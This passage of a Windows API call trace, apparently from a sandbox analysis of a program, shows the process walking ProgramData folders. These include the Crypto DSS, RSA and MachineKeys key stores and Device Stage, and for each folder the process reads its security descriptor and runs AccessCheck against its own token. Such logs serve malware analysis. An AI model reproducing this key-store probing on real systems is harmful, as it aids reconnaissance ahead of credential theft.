pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.166] GetLastError () returned 0x7a [0106.166] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Crypto\\DSS", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0x94, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281b560) returned 1 [0106.166] GetLastError () returned 0x7a [0106.166] GetCurrentThread () returned 0xfffffffe [0106.166] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.166] GetCurrentProcess () returned 0xffffffff [0106.166] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.166] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.166] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.166] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.167] CloseHandle (hObject=0x32c) returned 1 [0106.167] CloseHandle (hObject=0x344) returned 1 [0106.167] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.167] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.167] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.167] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.167] GetLastError () returned 0x7a [0106.167] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys", RequestedInformation=0x7, pSecurityDescriptor=0x572838, nLength=0x68, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x572838, lpnLengthNeeded=0x281afc8) returned 1 [0106.167] GetLastError () returned 0x7a [0106.167] GetCurrentThread () returned 0xfffffffe [0106.167] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.167] GetCurrentProcess () returned 0xffffffff [0106.167] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.167] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.167] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.167] AccessCheck (in: pSecurityDescriptor=0x572838, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.167] CloseHandle (hObject=0x340) returned 1 [0106.168] CloseHandle (hObject=0x32c) returned 1 [0106.168] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.168] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.168] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.168] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.168] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.168] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.168] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.169] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Crypto\\Keys", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.169] GetLastError () returned 0x7a [0106.169] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Crypto\\Keys", RequestedInformation=0x7, pSecurityDescriptor=0x572838, nLength=0x7c, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x572838, lpnLengthNeeded=0x281b560) returned 1 [0106.169] GetLastError () returned 0x7a [0106.169] GetCurrentThread () returned 0xfffffffe [0106.169] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.169] GetCurrentProcess () returned 0xffffffff [0106.169] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.169] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.169] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.169] AccessCheck (in: pSecurityDescriptor=0x572838, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.169] CloseHandle (hObject=0x32c) returned 1 [0106.169] CloseHandle (hObject=0x344) returned 1 [0106.169] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.169] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.169] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.170] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.170] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.170] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Crypto\\RSA", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.171] GetLastError () returned 0x7a [0106.172] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Crypto\\RSA", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0x94, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281b560) returned 1 [0106.172] GetLastError () returned 0x7a [0106.172] GetCurrentThread () returned 0xfffffffe [0106.172] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.172] GetCurrentProcess () returned 0xffffffff [0106.172] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.172] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.172] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.172] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.172] CloseHandle (hObject=0x32c) returned 1 [0106.172] CloseHandle (hObject=0x344) returned 1 [0106.172] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.172] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.172] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.172] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.172] GetLastError () returned 0x7a [0106.172] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys", RequestedInformation=0x7, pSecurityDescriptor=0x572838, nLength=0x68, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x572838, lpnLengthNeeded=0x281afc8) returned 1 [0106.173] GetLastError () returned 0x7a [0106.173] GetCurrentThread () returned 0xfffffffe [0106.173] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.173] GetCurrentProcess () returned 0xffffffff [0106.173] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.173] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.173] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.173] AccessCheck (in: pSecurityDescriptor=0x572838, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.173] CloseHandle (hObject=0x340) returned 1 [0106.173] CloseHandle (hObject=0x32c) returned 1 [0106.173] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.173] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.173] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.173] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.173] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.173] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.173] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.173] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.173] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.174] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.174] GetLastError () returned 0x7a [0106.174] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0x94, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281baf8) returned 1 [0106.174] GetLastError () returned 0x7a [0106.174] GetCurrentThread () returned 0xfffffffe [0106.174] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.174] GetCurrentProcess () returned 0xffffffff [0106.174] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.174] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.174] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.174] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.174] CloseHandle (hObject=0x344) returned 1 [0106.174] CloseHandle (hObject=0x33c) returned 1 [0106.174] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.174] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.174] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.175] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Device", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.175] GetLastError () returned 0x7a [0106.175] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Device", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0x94, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281b560) returned 1 [0106.175] GetLastError () returned 0x7a [0106.175] GetCurrentThread () returned 0xfffffffe [0106.175] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.175] GetCurrentProcess () returned 0xffffffff [0106.175] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.175] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.175] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.175] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.175] CloseHandle (hObject=0x32c) returned 1 [0106.175] CloseHandle (hObject=0x344) returned 1 [0106.175] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.176] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.176] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.193] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.193] GetLastError () returned 0x7a [0106.193] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0x148, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281afc8) returned 1 [0106.193] GetLastError () returned 0x7a [0106.193] GetCurrentThread () returned 0xfffffffe [0106.193] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.193] GetCurrentProcess () returned 0xffffffff [0106.193] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.193] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.193] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.193] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.193] CloseHandle (hObject=0x340) returned 1 [0106.193] CloseHandle (hObject=0x32c) returned 1 [0106.193] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.193] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.193] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.193] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.193] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.193] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.193] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.193] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.194] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.194] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.194] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.194] GetLastError () returned 0x7a [0106.194] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0x148, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281afc8) returned 1 [0106.194] GetLastError () returned 0x7a [0106.194] GetCurrentThread () returned 0xfffffffe [0106.194] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.194] GetCurrentProcess () returned 0xffffffff [0106.194] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.194] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.195] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.195] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.195] CloseHandle (hObject=0x340) returned 1 [0106.195] CloseHandle (hObject=0x32c) returned 1 [0106.195] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.195] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.195] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.195] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.195] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.195] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.195] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.195] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.195] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.195] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.195] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Task", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.195] GetLastError () returned 0x7a [0106.195] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Task", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0x94, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281b560) returned 1 [0106.195] GetLastError () returned 0x7a [0106.195] GetCurrentThread () returned 0xfffffffe [0106.195] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.195] GetCurrentProcess () returned 0xffffffff [0106.195] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.195] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.195] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.195] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.196] CloseHandle (hObject=0x32c) returned 1 [0106.196] CloseHandle (hObject=0x344) returned 1 [0106.196] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.196] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.196] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.197] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.197] GetLastError () returned 0x7a [0106.197] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0x148, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281afc8) returned 1 [0106.197] GetLastError () returned 0x7a [0106.197] GetCurrentThread () returned 0xfffffffe [0106.197] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.197] GetCurrentProcess () returned 0xffffffff [0106.197] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.197] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.197] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.197] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.197] CloseHandle (hObject=0x340) returned 1 [0106.197] CloseHandle (hObject=0x32c) returned 1 [0106.197] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.197] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.197] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 